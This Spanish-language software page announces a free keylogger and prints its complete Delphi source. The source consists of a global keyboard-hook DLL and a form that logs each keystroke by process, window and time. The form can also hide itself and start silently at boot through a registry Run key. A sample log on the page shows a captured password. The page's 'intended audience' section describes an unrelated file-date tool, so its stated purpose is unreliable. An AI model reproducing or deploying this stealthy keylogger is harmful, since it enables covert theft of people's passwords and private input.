Utilizamos cookies propias y de terceros. Al navegar entendemos que aceptas el uso de cookies. +Info.
Política de cookies
Proyecto AjpdSoft

· Inicio
· Buscar
· Contactar
· Cookies
· Descargas
· Foros
· Historia
· Nosotros
· Temas
· Top 10
· Trucos
· Tutoriales
· Usuario
· Wiki

Nick


Contraseña


Nuevo usuario


English

Delphi: AjpdSoft Keylogger
AjpdSoft


Añadida a la sección Descargas la aplicación AjpdSoft Keylogger: permite capturar las teclas pulsadas por el usuario en cualquier aplicación. Guarda el proceso, la ventana, la fecha y la hora y la pulsación de teclas realizada. La aplicación puede ocultarse para capturar las teclas sin molestar al usuario. Guarda el keylogger en un fichero y permite visualizarlo desde la aplicación. Liberamos el código fuente - source code en Borland Delphi 6 100% Open Source.



 

Definición Keylogger

Un keylogger (de key, tecla y logger, registrador) es un tipo de software que se encarga de registrar las pulsaciones que se realizan en el teclado, para guardarlas en un fichero o mostrarlas por pantalla o para enviarlas a través de internet.

Uno de sus usos frecuentes suele ser como malware del tipo daemon, permitiendo que otros usuarios tengan acceso a contraseñas importantes, como los números de una tarjeta de crédito, u otro tipo de información privada que se quiera obtener. Existen otros usos pero menos habituales.

El registro de lo que se teclea puede hacerse tanto con medios de hardware como de software. Los sistemas comerciales disponibles incluyen dispositivos que pueden conectarse al cable del teclado (lo que los hace inmediatamente disponibles pero visibles si un usuario revisa el teclado) y al teclado mismo (que no se ven). Por supuesto también puede hacerse por software, que es lo que explicaremos en este artículo. Realizar una aplicación que haga keylogging no es demasiado complicado y lo demostraremos a continuación.

 

Características más importantes de AjpdSoft Keylogger

  • Aplicación de muy sencillo manejo, muy fácil e intuitiva, todas las opciones están en una misma ventana.
  • La aplicación ha sido desarrollada en el lenguaje de programación Borland Delphi 6.
  • No necesita instalación, es suficiente con ejecutar el fichero keylogger.exe.
  • La aplicación puede ocultarse y seguir capturando las pulsaciones del teclado.
  • Las pulsaciones del teclado se muestran agrupadas por ventana, proceso y fecha y hora.
  • La aplicación puede configurarse para que sea ejecutada automáticamente al arrancar el equipo.
  • Muestra las pulsaciones de teclas realizadas por cada ventana (con el nombre de la ventana), proceso (con el nombre del proceso) y fecha y hora.

 

AjpdSoft Keylogger en funcionamiento

AjpdSoft Keylogger permite capturar las teclas pulsadas por el usuario en cualquier aplicación. Guarda el proceso, la ventana, la fecha y la hora y la pulsación de teclas realizada. La aplicación puede ocultarse para capturar las teclas sin molestar al usuario. Guarda el keylogger en un fichero y permite visualizarlo desde la aplicación.

Para inicar la captura de teclas (keylogger) pulsaremos en "Activar keylogger":

AjpdSoft Keylogger

Se iniciará la captura de teclas, el resultado aparecerá en pantalla y quedará guardado en un fichero llamado log_pulsaciones.txt:

AjpdSoft Keylogger

Un ejemplo de captura de pulsación de teclas:

---------
Proceso: firefox.exe
Ventana: AjpdSoft - Mozilla Firefox
Hora: 26/01/2010 23:06:16
---------
www.ajpdsoft.com

---------
Proceso: firefox.exe
Ventana: AjpdSoft - Mozilla Firefox
Hora: 26/01/2010 23:06:32
---------
varioscontraseña

---------
Proceso: gestionInfo.exe
Ventana: AjpdSoft Gestión Integral v. 2.6.9.492 (10-01-2010)
Hora: 26/01/2010 23:06:56
---------
La factura del cliente

---------
Proceso: firefox.exe
Ventana: Mozilla Firefox
Hora: 26/01/2010 23:07:21
---------
AjpdSoft

Para detener la captura de las pulsaciones de teclas pulsaremos, en la ventana anterior, "Detener keylogger".

Para visualizar el fichero de pulsaciones de teclas pulsaremos en "Abrir log":

AjpdSoft Keylogger

El fichero de pulsaciones se abrirá con la aplicación que tengamos asociada a la extensión "txt" (por defecto el Bloc de notas de Windows 7):

AjpdSoft Keylogger

Para eliminar el fichero de log pulsaremos en el botón "Eliminar fichero log":

AjpdSoft Keylogger

Nos pedirá confirmación, si no queremos que vuelva a pedirla marcaremos el check "No volver a pedir esta confirmación":

AjpdSoft Keylogger

Para poner la aplicación en modo oculto (sólo visible en el administrador de tareas) pulsaremos en el botón "Ocultar aplicación":

AjpdSoft Keylogger

Si no hemos iniciado el keylogger nos mostrará el siguiente aviso para iniciarlo:

AjpdSoft Keylogger

Con el texto: "Debe iniciar la captura de teclas (keylogger) antes de ocultar la aplicación. ¿Desea lanzar la captura de teclas ahora?".

A continuación nos mostrará el siguiente mensaje indicando que para volver a mostrar la aplicación hay que pulsar Control + Alt + N:

AjpdSoft Keylogger

El proceso quedará en memoria (keylogger.exe) y la aplicación no será visible para el usuario (seguirá capturando las pulsaciones de teclas). Lo podremos ver o finalizar desde el Administrador de tareas de Windows:

AjpdSoft Keylogger

 

Instalación y configuración de AjpdSoft Keylogger

Podéis descargar el programa con el código fuente (freeware, gratuito) desde esta URL:

Descarga gratuita (freeware) de AjpdSoft Keylogger

Para el correcto funcionamiento sólo es necesario el fichero keylogger.exe, el resto de ficheros corresponden al código fuente y no son necesarios para su ejecución.

La aplicación no necesita instalación de ningún tipo, el fichero keylogger.exe se puede ejecutar directamente.

 

Datos técnicos de AjpdSoft Keylogger

Esta aplicación ha sido desarrollada en el lenguaje de programación Borland Delphi 6.

Si eres desarrollador de software y te has registrado en nuestra web (si aún no te has registrado puedes hacerlo desde aquí gratuitamente) puedes descargar el código fuente 100% Open Source (completo y totalmente gratuito) en Borland (ahora Codegear) Delphi 6:

AjpdSoft Keylogger (Código fuente Open Source en Borland Delphi 6)

AjpdSoft Keylogger ha sido testeada y funciona correctamente en equipos con sistemas operativos: Windows 98, Windows XP, Windows 2000 Server, Windows Server 2003, Windows Vista y Windows Seven (7).

 

A quién va dirigida AjpdSoft Keylogger

La aplicación va dirigida a administradores de sistemas y usuarios que deseen, por algún motivo, cambiar la fecha de un fichero (tanto la de creación como la de modificación).

También puede ser útil para estudiantes que tengan que realizar algún proyecto de ejemplo de modificación de datos de un fichero con Delphi.

 

Anexo

  • Código fuente (source code) de la aplicación completa:

Unidad "UnidadMenuPrincipal.pas":

unit UnidadMenuPrincipal;

{$R WinXP.res}

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, Buttons, ComCtrls, registry, inifiles, shellapi,
  ThemeMgr;

type
  TformMenuPrincipal = class(TForm)
    btActivarKeylogger: TBitBtn;
    StatusBar1: TStatusBar;
    txtLog: TMemo;
    opIniciarConWindows: TCheckBox;
    bOcultarAplicacion: TBitBtn;
    btEliminarFicheroLog: TBitBtn;
    btMostrarLog: TBitBtn;
    btCerrar: TBitBtn;
    txtLogMostrado: TMemo;
    Label1: TLabel;
    lWeb: TLabel;
    ThemeManager1: TThemeManager;
    procedure btActivarKeyloggerClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure FormClose(Sender: TObject; var Action: TCloseAction);
    procedure bOcultarAplicacionClick(Sender: TObject);
    procedure btEliminarFicheroLogClick(Sender: TObject);
    procedure btMostrarLogClick(Sender: TObject);
    procedure btCerrarClick(Sender: TObject);
    procedure lWebClick(Sender: TObject);
  private
    { Private declarations }
    procedure activarKeylogger (activado : boolean);
    procedure guardarLog;
  public
    { Public declarations }
    procedure OnWmCopyData(var Msg: TMessage); message WM_COPYDATA;
  end;

const
  nombreDLL = 'HooK_DLL';

var
  formMenuPrincipal: TformMenuPrincipal;

  Function BeginMouseHook (HDest : THandle) : Boolean; stdcall; external nombreDLL;
  procedure EndMouseHook; stdcall; external nombreDLL;
  Function BeginKeybrdHook (HDest : THandle) : Boolean; stdcall; external nombreDLL;
  procedure EndKeybrdHook; stdcall; external nombreDLL;

implementation

{$R *.dfm}

uses TLHelp32;

type
  TRegistro = Record  //los datos que se guardarán en el fichero
    nombreProceso : String;
    nombreVentana : String;
    fechaHora : TDateTime;
  end;

  TUltimo = Record
    ProcessID : Cardinal;
    Control : Cardinal;
    Window : Cardinal;
  end;

  PKeybrdInfo = ^TKeybrdInfo;
  TKeybrdInfo = record
    VirtualKey : Integer;
    KeyStore   : Integer;
    CurrentProcessId: Cardinal;
    CurrentControl: Cardinal;
    WindowHwnd: Cardinal;
  end;


const
  ficheroLog = 'log_pulsaciones.txt';
  estadoBoton : Array[Boolean] of string =
      ('Activar keylogger', 'Detener keylogger');
  claveRUNWindows = 'SOFTWAREMicrosoftWindowsCurrentVersionRun';
  nombreClave = 'AjpdSoft Keylogger';

var
  registroPulsacion : TRegistro;
  F : TextFile; //para guardar las pulsaciones de teclas
  keyloggerActivado : Boolean = False;
  ultimo : TUltimo;
  ShortcutState : Array[0..1] of Boolean =(False,False);
                  //ShortcutState[0]= true si Ctrl est enfoncé
                  //ShortcutState[1]= true si N est Enfoncé


function GetModule(ProcessID : Cardinal) : ShortString;
var
  ProcessEntry : TProcessEntry32;
  Snap : Cardinal;
begin
  Snap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  try
    ProcessEntry.dwSize := SizeOf(ProcessEntry);
    if (Process32First(Snap, ProcessEntry)) then
    begin
      repeat
        if ProcessEntry.th32ProcessID = ProcessID then
        begin
          Result := String(ProcessEntry.szExeFile);
          Break;
        end;
      until not (Process32Next(Snap, ProcessEntry));
    end;
  finally
    Windows.CloseHandle(Snap);
  end;
end;


function mensajeConCheck (const mensaje, mensajeCheck: string;
    var valorCheck : boolean; tipoMensaje: TMsgDlgType;
    botonesMensaje: TMsgDlgButtons) : Word;
var
  chk : TCheckBox;
  frm : TForm;
begin
  frm := CreateMessageDialog(mensaje, tipoMensaje, botonesMensaje);
  with frm do
  try
    chk := TCheckBox.Create(frm);
    with chk do
    begin
      Checked := valorCheck;
      Caption := mensajeCheck;
      Left := 8;
      Top := frm.Height - Height - 12;
      Width := frm.width - left - 1;
      Parent := frm;
    end;
    Height := Height + chk.Height;
    Position := poScreenCenter;

    Result := ShowModal;

    valorCheck := chk.Checked;
  finally
    Free;
  end;
end;

//Lee un booleano de un INI
function leBoolINI (clave, cadena : string; defecto : boolean) : boolean;
begin
  with tinifile.create (changefileext(paramstr(0),'.INI')) do
  try
    result := readbool (clave, cadena, defecto);
  finally
    free;
  end;
end;

//escribe un Booleano en un INI
procedure esBoolINI (clave, cadena : string; valor : boolean);
begin
  with tinifile.create (changefileext(paramstr(0),'.INI')) do
  try
    writeBool (clave, cadena, valor);
  finally
    free;
  end;
end;


procedure TformMenuPrincipal.guardarLog;
begin
  try
    if FileExists (ficheroLog) then
      Append (F)
    else
      Rewrite (F);
    WriteLn (F, '---------');
    Writeln (F, 'Proceso: ' + registroPulsacion.nombreProceso);
    Writeln (F, 'Ventana: ' + registroPulsacion.nombreVentana);
    Writeln (F, 'Hora: ' + DateToStr(registroPulsacion.fechaHora) + ' '
        + TimeToStr(registroPulsacion.fechaHora));
    WriteLn (F, '---------');
    Writeln (F, txtLog.Text);
    Writeln (F);
  finally
    CloseFile (F);
  end;
  txtLogMostrado.Lines.LoadFromFile(ficheroLog);  
end;

procedure TformMenuPrincipal.OnWmCopyData (var Msg: TMessage);
var
  WText: array[0..255] of Char;
begin
  if Msg.WParam = 1 then
  begin
    with PKeybrdInfo(PCopyDataStruct(Msg.LParam)^.lpData)^ do
    begin
      if not Visible then
      begin
        case VirtualKey of
          17 : ShortcutState[0] := (KeyStore and $80000000)=0; //tecla control pulsada
          78 : ShortcutState[1] := (KeyStore and $80000000)=0; //tecla "n" pulsada
        end;
        if ShortcutState[0] and ShortcutState[1] and
            ((KeyStore and $20000000)<> 0) then
        begin
          ShortcutState[0] := False;
          ShortcutState[1] := False;
          self.Visible := True;
        end;
      end;

      if (CurrentProcessId <> ultimo.ProcessID) or
          (CurrentControl <> ultimo.Control) or
          (WindowHWND <> ultimo.Window) then
      begin
        if txtLog.Lines.Count > 0 then
          guardarLog;
        txtLog.Lines.Clear;
        registroPulsacion.nombreProceso := GetModule(CurrentProcessId);
        GetWindowText(WindowHWND, WText, SizeOf(WText));
        registroPulsacion.nombreVentana := String(WText);
        registroPulsacion.fechaHora := Now;
      end;

      if (KeyStore and $80000000) = 0 then
        postMessage (txtLog.Handle, WM_KEYDOWN, VirtualKey, KeyStore)
      else
        PostMessage(txtLog.Handle, WM_KEYUP, VirtualKey, KeyStore);
           ultimo.ProcessID:= CurrentProcessId;
      ultimo.Control:= CurrentControl;
      ultimo.Window:=  WindowHWND;
    end;
  end;
end;


procedure TformMenuPrincipal.activarKeylogger (activado : boolean);
begin
  if Active then
    BeginKeybrdHook (Handle)
  else
  begin
    EndKeybrdHook;
    if txtLog.Lines.Count > 0 then
      guardarLog;
    txtLog.Lines.Clear;
  end;
  btActivarKeylogger.Caption := estadoBoton [activado];
  keyloggerActivado := activado;
end;


procedure TformMenuPrincipal.btActivarKeyloggerClick(Sender: TObject);
begin
  activarKeylogger (not keyloggerActivado);
end;

procedure TformMenuPrincipal.FormCreate(Sender: TObject);
var
  registroConf : TRegistry;
begin
  registroPulsacion.nombreProceso := #0;
  registroPulsacion.nombreVentana := #0;
  ultimo.ProcessID := 0;
  ultimo.Control := 0;
  ultimo.Window := 0;
  AssignFile(F, ficheroLog);

  if ParamStr(1) = 'oculto' then //si el programa debe abrirse en modo oculto
  begin
    Application.ShowMainForm := False;
    activarKeylogger (True);
  end;

  registroConf := TRegistry.Create;
  try
    registroConf.RootKey := HKEY_LOCAL_MACHINE;
    if registroConf.OpenKey (claveRUNWindows, False) then
      opIniciarConWindows.Checked :=
          (registroConf.ReadString(nombreClave) = '"'
           + ParamStr(0) + '" ' + '"oculto"');
    registroConf.CloseKey
  finally
    registroConf.Free;
  end;
end;

procedure TformMenuPrincipal.FormClose(Sender: TObject;
  var Action: TCloseAction);
var
  registroConf : TRegistry;
  S : string;
begin
  if keyloggerActivado then
    activarKeylogger (False); //detenemos la captura de pulsación de teclas

  S := #0;
  registroConf := TRegistry.Create;
  try
    registroConf.RootKey := HKEY_LOCAL_MACHINE;
    if registroConf.OpenKey (claveRUNWindows, False) then
    begin
      if opIniciarConWindows.Checked then
      begin
        registroConf.WriteString(nombreClave, '"' + ParamStr(0) + '" ' + '"oculto"');
      end
      else
        registroConf.DeleteValue (nombreClave);
    end
    else
      MessageDlg ('No se ha podido guardar el valor en el registro ' +
          'de configuraciones.', mtWarning, [mbok], 0);
  finally
    registroConf.Free;
  end;
end;

procedure TformMenuPrincipal.bOcultarAplicacionClick(Sender: TObject);
var
  resultadoCheck : Boolean;
  resultadoMensaje : Word;
begin
  if keyloggerActivado then
  begin
    resultadoMensaje := mrOk;
    if leBoolINI ('Configuración', 'Aviso mostrar aplicación', True) then
    begin
      resultadoCheck := False;
      resultadoMensaje :=
          mensajeConCheck ('La aplicación se ocultará.' + chr(13) +
              'Para volver a mostrarla pulse Control + Alt + N',
              'No volver a mostrar este mensaje',
          resultadoCheck, mtInformation, [mbOk]);
      if resultadoCheck then
        esBoolINI ('Configuración', 'Aviso mostrar aplicación', False);
    end;
    if resultadoMensaje = mrOk then
      self.Visible := false;
  end
  else
  begin
    if MessageDlg ('Debe iniciar la captura de teclas (keylogger) ' +
        'antes de ocultar la aplicación.' + #10 + #10
        + '¿Desea lanzar la captura de teclas ahora?',
        mtConfirmation, [mbYes, mbNo], 0) = mrYes then
    begin
      activarKeylogger (True);
      bOcultarAplicacion.Click;
    end;
  end;
end;

procedure TformMenuPrincipal.btEliminarFicheroLogClick(Sender: TObject);
var
  resultadoCheck : boolean;
  resultadoMensaje : Word;
begin
  resultadoCheck := false;
  if FileExists (ficheroLog) then
  begin
    resultadoMensaje := mrYes;
    if leBoolINI ('Configuración', 'Aviso eliminar fichero log', True) then
    begin
      resultadoMensaje :=
          mensajeConCheck ('¿Está seguro que desea eliminar ' +
          'el fichero de log (pulsaciones)?',
          'No volver a pedir esta confirmación',
           resultadoCheck, mtConfirmation, [mbYes, mbNo]);
    end;
    esBoolINI ('Configuración', 'Aviso eliminar fichero log', not resultadoCheck);
    if resultadoMensaje = mrYes then
      DeleteFile(ficheroLog)
  end
  else
    MessageDlg ('El fichero de log de pulsaciones (keylogger) no existe.',
        mtWarning, [mbOk], 0);
end;

procedure TformMenuPrincipal.btMostrarLogClick(Sender: TObject);
begin
  if FileExists(ficheroLog) then
    ShellExecute (0, 'open', ficheroLog, Nil, '', SW_SHOW)
  else
    MessageDlg ('No existe el fichero de log de pulsaciones (keylogger).',
        mtInformation, [mbOk], 0);
end;

procedure TformMenuPrincipal.btCerrarClick(Sender: TObject);
begin
  Close;
end;

procedure TformMenuPrincipal.lWebClick(Sender: TObject);
begin
  ShellExecute (0, 'open', 'http://www.ajpdsoft.com', Nil, '', SW_SHOW)
end;

end.

 

library HooK_DLL;

library HooK_DLL;

uses
  SysUtils, Windows, Messages, Classes, Dialogs;

{$R *.res}
type
  PTMapFile = ^TMapFile;
  TMapFile = record
    HMouseHook : Cardinal;
    HKeybrdHook : Cardinal;
    HMouseDestWindow : Cardinal;
    HKeybrdDestWindow : Cardinal;
  end;

  TMouseInfo = record
    aMsg : WParam;
    pt : TPoint;
    hwnd : HWND;
    wHitTestCode : UINT;
    dwExtraInfo : DWORD;
  end;

  TKeybrdInfo = record
    VirtualKey : Integer;
    KeyStore : Integer;
    CurrentProcessId : Cardinal;
    CurrentControl : Cardinal;
    WindowHwnd : Cardinal;
  end;

var
  HMapFile : Cardinal = 0;
  PMapFile : PTMapFile = nil;

function MouseProc(Code : integer; Msg : WPARAM;
    MouseHook : LPARAM) : LRESULT; stdcall;
var
  InfoEnvoye : TMouseInfo;
  MouseStruct : TMouseHookStruct;
  CopyDataStruct : TCopyDataStruct;
begin
  Result := 0;
  if Code = HC_ACTION then
  begin
    MouseStruct := PMouseHookStruct(MouseHook)^;
    if PMapFile^.HMouseDestWindow <> 0 then
    begin
      InfoEnvoye.pt := MouseStruct.pt;
      InfoEnvoye.hWnd := MouseStruct.hwnd;
      InfoEnvoye.wHitTestCode := MouseStruct.wHitTestCode;
      InfoEnvoye.dwExtraInfo := MouseStruct.dwExtraInfo;
      InfoEnvoye.AMsg := Msg;

      CopyDataStruct.cbData := SizeOf(InfoEnvoye);
      CopyDataStruct.lpData := @InfoEnvoye;

      SendMessage(PMapFile.HMouseDestWindow, WM_COPYDATA, 0,
          LongInt(@CopyDataStruct));
    end;
  end;
  if Code < HC_ACTION then
    Result := CallNextHookEx(PMapFile^.HMouseHook, Code, Msg, MouseHook);
end;

function BeginMouseHook(HDest : THandle):Boolean;stdcall;
begin
  Result := False;
  if (HDest <> 0) and (PMapFile^.HMouseHook = 0) then
  begin
    PMapFile^.HMouseDestWindow := HDest;
    PMapFile^.HMouseHook := SetWindowsHookEx(WH_MOUSE,
        @MouseProc, HInstance, 0);
    Result := True;
  end;
end;

procedure EndMouseHook ;stdcall;
begin
  UnhookWindowsHookEx(PMapFile^.HMouseHook);
  PMapFile^.HMouseDestWindow := 0;
  PMapFile^.HMouseHook := 0;
end;

function KeyboardProc(Code : integer; VirtualKeyCode : WPARAM;
    KeyStoreMsgInfo : LPARAM) : LRESULT; stdcall;
var
  KeybrdInfo : TKeybrdInfo;
  CopyDataStruct : TCopyDataStruct;
begin
  Result := 0;
  if Code = HC_ACTION then
  begin
    KeybrdInfo.VirtualKey := VirtualKeyCode;
    KeybrdInfo.KeyStore := KeyStoreMsgInfo;
    KeybrdInfo.CurrentProcessId := GetCurrentProcessId;
    KeybrdInfo.CurrentControl := GetFocus;
    KeybrdInfo.WindowHwnd := GetActiveWindow;
    CopyDataStruct.cbData := SizeOf(KeybrdInfo);
    CopyDataStruct.lpData := @KeybrdInfo;
    SendMessage(PMapFile^.HKeybrdDestWindow, WM_COPYDATA,
        1, LongInt(@CopyDataStruct));
  end;
  if Code < HC_ACTION then
    Result:= CallNextHookEx(PMapFile^.HKeybrdHook,
        Code, VirtualKeyCode, KeyStoreMsgInfo);
end;

function BeginKeybrdHook(HDest : THandle) : Boolean; stdcall;
begin
  Result := False;
  if (HDest <> 0) and (PMapFile^.HKeybrdHook = 0) then
  begin
    PMapFile^.HKeybrdDestWindow := HDest;
    PMapFile^.HKeybrdHook := SetWindowsHookEx(WH_KEYBOARD,
        @KeyboardProc, HInstance, 0);
    Result := True;
  end;
end;

procedure EndKeybrdHook; stdcall;
begin
  UnhookWindowsHookEx(PMapFile^.HKeybrdHook);
  PMapFile^.HKeybrdDestWindow := 0;
  PMapFile^.HKeybrdHook := 0;
end;


Procedure LibraryProc(Reason : Integer);
begin
  case Reason of
    DLL_PROCESS_ATTACH :
    begin
      HMapFile := CreateFileMapping ($FFFFFFFF, nil, PAGE_READWRITE,
          0, sizeof(TMapFile), 'NMB HOOK');
      PMapFile := MapViewOfFile(HMapFile, FILE_MAP_WRITE, 0, 0, 0);
    end;

    DLL_PROCESS_DETACH :
     begin
       UnmapViewOfFile(PMapFile);
       CloseHandle(HMapFile); 
     end;
  end;
end;

Exports EndMouseHook;
Exports BeginMouseHook;
Exports BeginKeybrdHook;
Exports EndKeybrdHook;

begin
  DllProc := @LibraryProc;
  LibraryProc (DLL_PROCESS_ATTACH);
end.

Artículos relacionados

 

Créditos

Artículo realizado íntegramente por Alonsojpd miembro fundador del proyecto AjpdSoft.


Anuncios


Enviado el Viernes, 29 enero a las 22:45:37 por ajpdsoft
Este sitio web NO CONTIENE malware, todos los programas con código fuente aquí. Autor: Alonso Javier Pérez Díaz Google+ Síguenos en Google+